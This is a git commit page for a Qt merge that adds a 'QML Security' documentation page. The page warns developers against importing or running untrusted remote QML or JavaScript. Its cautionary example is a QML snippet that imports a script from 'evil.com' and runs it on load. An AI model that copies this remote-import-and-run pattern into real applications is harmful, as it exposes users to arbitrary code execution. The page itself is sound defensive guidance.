diff options
author | Frederik Gladhorn <frederik.gladhorn@digia.com> | 2013-01-09 12:15:59 +0100 |
---|---|---|
committer | Frederik Gladhorn <frederik.gladhorn@digia.com> | 2013-01-17 12:44:43 +0100 |
commit | 3146dcbdc768c90a03b58eed3f42630604443093 (patch) | |
tree | 10e234460c5f57012b346cdbe6304002ad0a446d /src/doc/src/declarative/qdeclarativesecurity.qdoc | |
parent | a7ea2afffd61e2a89f7bb2c586b4b733c4996bb5 (diff) | |
parent | 722725cf24e45e86a2844810b90787a29df8a4a9 (diff) |
Merge branch 'stable' into dev
Conflicts:
sync.profile
tests/auto/declarative/qdeclarativelanguage/tst_qdeclarativelanguage.cpp
Change-Id: I3620d15b4163fec420d18f6be50cae1635b99a2f
Diffstat (limited to 'src/doc/src/declarative/qdeclarativesecurity.qdoc')
-rw-r--r-- | src/doc/src/declarative/qdeclarativesecurity.qdoc | 80 |
1 files changed, 80 insertions, 0 deletions
diff --git a/src/doc/src/declarative/qdeclarativesecurity.qdoc b/src/doc/src/declarative/qdeclarativesecurity.qdoc new file mode 100644 index 00000000..f3c958fc --- /dev/null +++ b/src/doc/src/declarative/qdeclarativesecurity.qdoc @@ -0,0 +1,80 @@ +/**************************************************************************** +** +** Copyright (C) 2012 Digia Plc and/or its subsidiary(-ies). +** Contact: http://www.qt-project.org/legal +** +** This file is part of the documentation of the Qt Toolkit. +** +** $QT_BEGIN_LICENSE:FDL$ +** Commercial License Usage +** Licensees holding valid commercial Qt licenses may use this file in +** accordance with the commercial license agreement provided with the +** Software or, alternatively, in accordance with the terms contained in +** a written agreement between you and Digia. For licensing terms and +** conditions see http://qt.digia.com/licensing. For further information +** use the contact form at http://qt.digia.com/contact-us. +** +** GNU Free Documentation License Usage +** Alternatively, this file may be used under the terms of the GNU Free +** Documentation License version 1.3 as published by the Free Software +** Foundation and appearing in the file included in the packaging of +** this file. Please review the following information to ensure +** the GNU Free Documentation License version 1.3 requirements +** will be met: http://www.gnu.org/copyleft/fdl.html. +** $QT_END_LICENSE$ +** +****************************************************************************/ + +/*! +\page qdeclarativesecurity.html +\title QML Security +\section1 QML Security + +The QML security model is that QML content is a chain of trusted content: the user +installs QML content that they trust in the same way as they install native Qt applications, +or programs written with runtimes such as Python and Perl. That trust is establish by any +of a number of mechanisms, including the availability of package signing on some platforms. + +In order to preserve the trust of users, developers producing QML content should not execute +arbitrary downloaded JavaScript, nor instantiate arbitrary downloaded QML elements. + +For example, this QML content: + +\qml +import QtQuick 1.0 +import "http://evil.com/evil.js" as Evil + +Component { + onLoaded: Evil.doEvil() +} +\endqml + +is equivalent to downloading "http://evil.com/evil.exe" and running it. The JavaScript execution +environment of QML does not try to stop any particular accesses, including local file system +access, just as for any native Qt application, so the "doEvil" function could do the same things +as a native Qt application, a Python application, a Perl script, etc. + +As with any application accessing other content beyond it's control, a QML application should +perform appropriate checks on untrusted data it loads. + +A non-exhaustive list of the ways you could shoot yourself in the foot is: + +\list + \li Using \c import to import QML or JavaScript you do not control. BAD + \li Using \l Loader to import QML you do not control. BAD + \li Using \l{XMLHttpRequest}{XMLHttpRequest} to load data you do not control and executing it. BAD +\endlist + +However, the above does not mean that you have no use for the network transparency of QML. +There are many good and useful things you \e can do: + +\list + \li Create \l Image elements with source URLs of any online images. GOOD + \li Use XmlListModel to present online content. GOOD + \li Use \l{XMLHttpRequest}{XMLHttpRequest} to interact with online services. GOOD +\endlist + +The only reason this page is necessary at all is that JavaScript, when run in a \e{web browser}, +has quite many restrictions. With QML, you should neither rely on similar restrictions, nor +worry about working around them. +*/ |